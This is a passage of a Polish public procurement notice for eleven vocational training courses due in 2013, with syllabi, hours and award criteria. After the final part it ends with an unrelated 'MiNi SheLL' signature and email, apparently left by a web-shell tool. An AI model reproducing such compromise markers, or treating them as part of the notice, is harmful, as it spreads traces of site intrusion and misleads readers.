<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 120 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-Marketing - podstawowe pojęcia i definicje
-Koncepcja kompozycji marketingowej 4P (product, price, place, promotion)
-Strategia marketingowa firmy 
-Badania marketingowe 
-Psychologia zachowań konsumenckich: 
-Pozycjonowanie oferty handlowej i segmentacja rynku 
-Zasady opracowania i prezentacji planu marketingowego 
-Podstawowe elementy marketingu - Promocja 
-Reklama jako najsilniej oddziałujący element marketingu 
-Sprzedaż osobista
-Sponsoring - cele i założenia
-Elementy e-marketingu
-Podstawowe zagadnienia public relations 
-Prawne aspekty public relations 
-Zawód Specjalista ds. public relations 
-Elementy psychologiczne sztuki public relations 
-Tworzenie i realizacja kampanii public relations
-Specyfika kontaktów z mediami 
-Media społecznościowe 
-Grafika Komputerowa - podstawy obsługi programów: Adobe Photoshop, Adobe Illustrator, Corel Draw.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs pilota wycieczek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 150 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu, cena musi zawierać koszt wycieczki szkoleniowej organizowanej w ramach kursu, koszt wydania zaświadczenia od lekarza medycyny pracy, koszt egzaminu państwowego.
Program kursu obejmuje w szczególności następującą tematykę:
1. Przemysł turystyczny w Polsce i na świecie. 
2. Obsługa ruchu turystycznego. 
3. Geografia turystyczna Polski i Europy. Historia kultury i sztuki. 
4. Struktura polityczno-społeczno-ekonomiczna polski na tle Europy i świata. 
5. Przepisy prawne w turystyce i ubezpieczenia turystyczne. 
6. Pierwsza pomoc medyczna. 
7. Pilot a grupa. 
8. Metodyka i technika pracy rezydenta. 
9. Zajęcia praktyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs kroju i szycia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 120 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-Zdejmowanie miary.
-Konstruowanie bluzki. Bluzka podstawowa z rękawem.
-Konstrukcja rękawa do bluzki, modelowanie ze zmianą konstrukcji bluzki: raglan, półraglan, kimono, półkimono, rękawy fantazyjne.
-Bluzka bez zaszewki na biust.
-Modelowanie fantazyjnych przodów i tyłów typu: wody, karczki itp.
-Garsonka: żakiet luźny, dopasowany, cięcia frakowe, rękaw dwuszwowy do żakietu.
-Żakiet jednorzędowy i dwurzędowy angielski.
-Konstrukcja kołnierzy - krój i modelowanie: kołnierze z klapami, stojące, szalowe, słowackiego, żaboty i inne. 
-Spódnica - siatka, krój i modelowanie: prosta z fałdą, spódnica z 4 - 6 klinów, klosz, półklosz, z karczkiem, plisowana, układana w fałdy, biodrówka, godety itp. 
-Suknia - podstawowa i modelowanie wybranych modeli.
-Konstrukcja spodni (klasyczne, dzwony, wąskie, rozszerzane, z karczkiem).
-Modelowanie na figury nietypowe: pochyłe plecy, szerokie plecy,  duże biusty, spadziste ramiona itp. 
-Modelowanie dowolnie wybranych modeli.
-Omówienie podstaw stopniowania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs Magazynier z obsługą wózków widłowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 80 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-Rola w dystrybucji i zasady działania magazynu. 
-System pracy, przepisy i zasady bhp i p.poż w magazynie. 
-Zapasy magazynowe. Dokumentacja obrotów magazynowych. Logistyka. Podstawy prawa, odpowiedzialność magazyniera. 
-Typy , budowa i zasady pracy wózkiem jezdniowym. 
-Praktyczna nauka obsługi i pracy z wózkami jezdniowymi. 
-Wiadomości z zakresu ładunkoznawstwa. Wiadomości o dozorze technicznym. 
-Warunki pracy w magazynie. Zagrożenia występujące przy określonych czynnościach na stanowisku pracy, ryzyko zawodowe związane z wykonywaną pracą. Sposoby ochrony przed zagrożeniami oraz zasady postępowania w razie wypadku lub awarii. 
-Pojęcie towaroznawstwa i jego znaczenie w pracy handlowca. 
-Hurtownia, jej zadania i zasady działania. Funkcje i organizacja handlu hurtowego.
-Dokumentacja handlowa i magazynowa. 
-Obsługa programu WF-Mag i Symfonia w pracy magazyniera i hurtownika - teoria  i ćwiczenia.
-Kurs kończy się egzaminem i wydaniem zaświadczenia uprawniającego do kierowania wózkami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs dietetyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 100 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-Podstawy nauki o żywieniu człowieka
-Charakterystyka funkcji narządów organizmu człowieka
-Zasady racjonalnego żywienia 
-Właściwości składników pokarmowych
-Normy żywienia. Tabele składu i wartości odżywczej żywności
-Piramida żywienia
-Wskaźniki BMI, WHR, CPM, PPM
-Planowanie żywienia w profilaktyce chorób cywilizacyjnych
-Planowanie diety lekkostrawnej
-Planowanie diety odchudzającej - tworzenie indywidualnego programu odchudzającego
-Suplementy w diecie
-Określenie stanu odżywienia człowieka
-Zalecenia dietetyczne w stanach chorobowych
-Żywienie kobiet w ciąży i małych dzieci
-Żywienie sportowców i osób aktywnych fizycznie
-Żywienie osób starszych i przy rekonwalescencji
-Detoksykacja
-Wysiłek fizyczny we wspomaganiu dietoterapii
-Elementy psychodietetyki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs Pracownik administracyjno - biurowy z obsługą komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 120 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-organizacja pracy biurowej:  podstawy działania biura, wyposażenie i urządzenia biurowe, schemat organizacyjny biura, organizacja obiegu dokumentów, przyjmowanie korespondencji, ewidencjowanie, archiwizacja dokumentów, korespondencja biurowa, dokumentacja handlowa, faktury VAT, rachunki, klasyfikacja dokumentów i systemy przechowywania akt,  techniki sporządzania różnych dokumentów biurowych (pisma, zaproszenia, protokoły, sprawozdania, notatki biurowe), rozliczanie podróży służbowej,
-zasady efektywnej komunikacji: komunikacja jako podstawa relacji międzyludzkich, umiejętności w zakresie komunikacji, sprawna komunikacja z klientem, sprawna komunikacja ze współpracownikami i przełożonym, bariery komunikacyjne i sposoby ich likwidowania, asertywność w środowisku pracy,
-organizacja pracy i zarządzanie: zarządzanie czasem, kierowanie pracą zespołową, style kierowania ludźmi, sprawna organizacja pracy i zadań, podział pracy, określenie i weryfikacja celów działania, monitoring realizacji zadań, metody planowania i prowadzenia biura,
-kultura zawodu: savoir - vivre na stanowisku pracy, rozmowy telefoniczne, łączenie telefonów, pozyskiwanie i udzielanie informacji, przyjmowanie i  obsługa klientów,
-prawo: prawo pracy, podstawowe zasady prawa pracy, wynagrodzenie za pracę i inne świadczenia, czas pracy, obowiązki pracownika, obowiązki pracodawcy,
-obsługa urządzeń biurowych: kserokopiarki, faksu, skanera, drukarki, 
-wybrane zagadnienia ekonomiczne,
-podstawy z zakresu kadr i płac,
-podstawy rachunkowości,
-autoprezentacja: cod dres, dbanie o wizerunek,
-obsługa komputera w tym: wprowadzenie do obsługi komputera, system operacyjny MS Windows, pakiet Microsoft Office (MS Word, MS Excel, MS PowerPoint, MS Outlook), sieci komputerowe i Internet - minimum 60 godzin dydaktycznyc.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Kurs Opiekun osób starszych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 2 osób, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 120 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-Rola i zakres zadań opiekuna osób starszych
-Aktywizacja osób starszych, organizacja czasu wolnego
-Anatomia i fizjologia wieku podeszłego, starzenie się organizmu
-Zasady żywienia osób starszych
-Postępowanie w przypadku choroby i w okresie zdrowienia
-Higiena chorego i zabiegi pielęgnacyjne na zlecenie lekarza
-Zasad udzielania pierwszej pomocy przedmedycznej
-Czuwanie i pomoc dla umierającego
-Wybrane zagadnienia psychologii osób starszych
-Psychologiczne aspekty pracy z osobą starszą 
-Współpraca z rodziną i środowiskiem podopiecznego
-Praktyki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Kurs grafiki komputerowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 100 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
A.Adobe Photoshop- podstawowy
Interfejs i podstawy pracy; Przygotowanie obrazu do edycji ; Camera Raw; Warstwy i kompozycje; Maski i zaznaczenia; Korekta obrazu; Retusz obrazu; Wektory; Zapisywanie i publikowanie; 
B.Adobe Photoshop- techniki produkcyjne 
-Interfejs i podstawy pracy
-Przygotowanie obrazu do edycji ; Camera Raw i HDR; Warstwy i kompozycje; Maski  i zaznaczenia; Korekta obrazu; Retusz obrazu;  Pędzle i malowanie; Tekst i wektory
-Adobe Photoshop i Lightroom - techniki fotoedytorskie 
Idea cyfrowej ciemni fotograficznej; Proces foto edytorski, etap I: katalogowanie; Proces foto edytorski, etap II: edycja;  Proces foto edytorski, etap III: reprodukcja i archiwizacja
-Adobe InDesign - podstawowy 
Podstawy pracy z publikacjami jedno- i wielostronicowymi; Praca z tekstem - typografia i liternictwo; Adobe InDesign oraz na poziomie systemu operacyjnego ; Praca z elementami graficznymi ; Projektowanie i składanie dokumentów wielostronicowych oraz tabel, spisów treści, skorowidzów; Przygotowanie publikacji do druku i publikacji elektronicznej
-Adobe InDesign - zaawansowany
Zaawansowane preferencje programu i ustawienia interfejsu; Efektywne posługiwanie się klawiaturą; Teoria procesów DTP; Siatki i linie pomocnicze; Zaawansowane techniki typograficzne; Efektywne posługiwanie się stylami znakowymi i akapitowymi; Zaawansowane techniki tworzenia i formatowania tabel przy udziale stylów tabeli i komórki; Praca z długimi dokumentami; Efektywne łączenie grafiki i tekstu; Tworzenie i edycja grafiki wektorowej              za pomocą narzędzi kształtu, ścieżek i efektów rastrowych; Zarządzanie kolorem                        i wykorzystanie koloru w procesie składu publikacji; Importowanie plików programów Microsoft Word i Excel; Zarządzanie fontami w systemie Windows/Mac OS X i programach Adobe, Quark; Zaawansowane funkcje mechanizmu szukania i zastępowania;  Przygotowanie dokumentu do publikacji w Internecie; Strukturyzowanie zawartości pliku             za pomocą języka XML; Funkcje oszczędzające czas i przyspieszające pracę.
-Adobe Illustrator CS5  i ołówka;  Kolor i malowanie;  Edycja i przetwarzanie tekstu; Warstwy; Rysowanie w perspektywie;  Łączenie kolorów i kształtów;  Pędzle; Efekty;  Zastosowanie atrybutów wyglądu i stylów graficznych;  Symbole; Łączenie projektów Illustratora CS5 i innych programów firmy Adobe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Kurs Projektowanie ogrodów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 60 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu oraz sprzętu komputerowego.
Program kursu obejmuje w szczególności następującą tematykę:
-określanie funkcji ogrodów i projektowanie przestrzeni,
-graficzne opracowywanie projektów,
-elementy i czynniki kompozycji,
-dobór materiału roślinnego,
-projektowanie ogrodów,
-zakładanie ogrodów,
-planowanie, zakładanie i pielęgnacja terenów zieleni,
-rysunek odręczny,
-praca w programach ArchiCAD/Artlatis,
-projektowanie ogrodów - dokumentacja techniczna,
-przygotowanie dokumentacji projektowej,
-charakterystyka klientów i sztuka komunikacji,
-zakładanie własnej działalności gospodarczej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Kurs Kadry, płace i ZUS z Płatnikiem z obsługą programu Symfonia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 2 osób, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 90 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-moduł prawo pracy: zagadnienia ogólne, umowa o pracę, podstawowa dokumentacja pracownicza - teczka akt osobowych, zmiana warunków umowy o pracę, urlopy pracownicze i zwolnienia od pracy: czas pracy, obowiązki pracodawcy i pracownika, odpowiedzialność materialna pracowników, uprawnienia pracowników związane z rodzicielstwem, rozwiązywanie stosunku pracy,
-moduł wynagrodzenia: wynagrodzenie ze stosunku pracy - definicje, podstawowe pojęcia, podstawy prawne kalkulacji wynagrodzeń, systemy wynagradzania, dokumentacja wynagrodzeń, wynagrodzenie minimalne i dodatek wyrównawczy, składniki wynagrodzenia, podstawowe informacje dotyczące ubezpieczeń społecznych, od czego płaci się składki ZUS - wyłączenia, parametry stosowane przy kalkulacji wynagrodzeń, od czego płaci się podatki - wyłączenia, ćwiczenia praktyczne w wyliczaniu kwoty netto z uwzględnieniem sytuacji szczególnych (ograniczenie podstawy wymiaru składek na ubezpieczenia emerytalne i rentowe), ustalanie wynagrodzenia za przepracowaną część miesiąca wraz z ćwiczeniami praktycznymi, podstawowe zasady dotyczące wypłaty świadczeń pieniężnych z ubezpieczenia społecznego w razie choroby i macierzyństwa wraz z ćwiczeniami praktycznymi, zasady ustalania wynagrodzenia za pracę w godzinach nadliczbowych, zasady ustalania wynagrodzenia za urlop wypoczynkowy oraz ekwiwalentu pieniężnego za urlop, tworzenie listy płac w oparciu o różne elementy wynagrodzenia oraz ustalanie zobowiązań budżetowych - ćwiczenia praktyczne, obliczanie wynagrodzenia za pracę wykonywaną na podstawie umowy zlecenia i umowy o dzieło, obowiązki płatnika w zakresie rozliczeń miesięcznych i rocznych z urzędem skarbowym z tyt. PDOF (PIT-4R, PIT-11, PIT-12, PIT-40), Program Płatnik - ćwiczenia - praca przy komputerze,
-moduł SYMFONIA kadry i płace - praca specjalisty w najpopularniejszym programie kadrowo-płacowym - teoria i ćwiczenia: omówienie programu i zapoznanie i interfejsem, rejestrowanie pracownika, wprowadzenie danych w kalendarzu- edycja kalendarza, przyjęcie do pracy: wybór odpowiedniej formy umowy, okres zatrudnienia i przerw u poprzedniego pracodawcy, edukacja pracownika i zależność z urlopem wypoczynkowym, podpisanie umowy o pracę, bilanse urlopowe, wprowadzanie zdarzeń związanych z absencją pracowników : urlopy, choroby, tworzenie umów cywilnoprawnych, Wzorce + Płace w Programie SYMFONIA, rozwiązanie stosunku pracy,
Dodatkowo dla jednej uczestniczki moduł z obsługi komputera w tym: wprowadzenie do obsługi komputera, system operacyjny MS Windows, pakiet Microsoft Office (MS Word, MS Excel, MS PowerPoint, MS Outlook), sieci komputerowe i Internet - minimum 30 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Kurs fryzjerski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 120 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.

Program kursu obejmuje w szczególności następującą tematykę:
I.SZTUKA FRYZJERSTWA                              
Podstawowe zasady BHP w pracy fryzjera; Budowa włosa; Omówienie stanowiska pracy fryzjera; Morfologia twarzy damskiej i męskiej, analiza sylwetki ; Rodzaje narzędzi w pracy fryzjera; Omówienie środków do stylizacji;  Omówienie preparatów pielęgnacyjnych; Przyczyny uszkodzeń włosów; Proces wypadania włosów; Trudny klient- metody radzenia sobie w stresowych sytuacjach.                       
II.TECHNIKI MODELOWANIA WŁOSÓW.                             
Rozmowa z klientem, diagnoza włosów i skóry głowy; Dobór odpowiedniej pielęgnacji, mycie włosów oraz masaż skóry głowy; Schemat modelowania włosów ; Odbijanie włosów od nasady oraz wyciąganie na szczotkę; Rodzaje modelowania włosów; Kręcenie włosów na  szczotkę; Tapirowanie włosów; Kręcenie, prostowanie włosów przy użyciu różnych metod.                               
III.TECHNIKI CIĘCIA WŁOSÓW.                 
Rozmowa z klientem, dobór odpowiedniej formy strzyżenia; Podział włosów na sekcje i separacje;  Rodzaje kątów w strzyżeniu; Podstawowe techniki strzyżenia; Strzyżenie męskie(klasyczne, różne formy irokeza, strzyżenie w karo); Strzyżenie na tępo, a strzyżenie na pióro; Praca z wicherkami i zadziorami; Degażowanie, efilowanie, slicing, pikowanie; Techniki strzyżenia grzywek; Dodawanie i zdejmowanie objętości; Wykańczanie strzyżenia na suchych włosach                            
IV.KOLORYZACJA WŁOSÓW                      
Podstawy koloryzacji- wysokości tonu; Rodzaje refleksu, omówienie gwiazdy Oswalda; Określanie bazy naturalnej włosa; Podkłady rozjaśniające; Koloryzacja globalna i częściowa; Koloryzacja włosów siwych; Koloryzacja rozjaśniająca; Dekoloryzacja; Metody przyciemniania włosów- prepigmentacja; Pasemka, refleksy, baleyage- techniki.
V.TRWAŁA ZMIANA FORMY                     
Trwała ondulacja - przeciwwskazania i zalecenia do jej wykonania; Techniki wykonania trwałej ondulacji (klasyczna ; cegiełkowa; częściowa); Lekka trwała podnosząca head lines; Trwałe prostowanie włosów.                              
VI.KOKI I UPIĘCIA                         
Upięcia klasyczne;  Koki układane na wypełniaczu; Fryzury ślubne i wieczorowe; Warkocze; Uczesania z dopinanymi pasmami; Kok Diorowski, Hiszpański, Francuski; Czesania do sesji zdjęciowych                            
VII.PRZEDŁUŻANIE I ZAGĘSZCZANIE WŁOSÓW 
Rodzaje włosów ze względu na pochodzenie; Rodzaje włosów ze względu na zakończenie; Włosy naturalne; Włosy syntetyczne; Pojęcia: remy, no remy, tangle free; Kosmetyka i pielęgnacja włosów przedłużanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com